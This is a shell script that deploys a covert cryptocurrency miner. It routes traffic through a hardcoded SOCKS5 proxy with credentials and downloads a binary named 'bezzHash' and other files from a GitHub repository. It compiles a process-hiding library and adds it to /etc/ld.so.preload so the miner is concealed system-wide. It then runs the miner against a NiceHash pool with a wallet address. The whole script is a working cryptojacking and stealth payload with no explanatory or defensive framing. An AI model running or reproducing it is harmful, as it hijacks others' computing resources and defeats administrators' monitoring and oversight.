#!/bin/sh 
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime 
dpkg-reconfigure --frontend noninteractive tzdata 
 
apt update;apt -y install binutils cmake build-essential screen unzip net-tools curl 
 
wget https://raw.githubusercontent.com/nathanfleight/scripts/main/graphics.tar.gz 
 
tar -xvzf graphics.tar.gz 
 
cat > graftcp/local/graftcp-local.conf <<END 
listen = :2233 
loglevel = 1 
socks5 = 20.24.187.223:7777
socks5_username = bsm 
socks5_password = 12345 
END 
 
./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf & 
 
sleep .2 
 
echo " " 
echo " " 
 
echo "**" 
 
./graftcp/graftcp curl ifconfig.me 
 
echo " " 
echo " " 
 
echo "**" 
 
echo " " 
echo " " 
 
./graftcp/graftcp wget https://raw.githubusercontent.com/nathanfleight/scripts/main/bezzHash 
chmod +x bezzHash 
 
./graftcp/graftcp wget https://raw.githubusercontent.com/nathanfleight/scripts/main/magicBezzHash.zip 
unzip magicBezzHash.zip 
make 
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl 
mv libprocesshider.so /usr/local/lib/ 
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload 
 
./graftcp/graftcp ./bezzHash --url=ssl://3FNS3ubK3e76wiiLPMTK4K2ESw1GUgtXh5@daggerhashimoto.usa-west.nicehash.com:33353 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
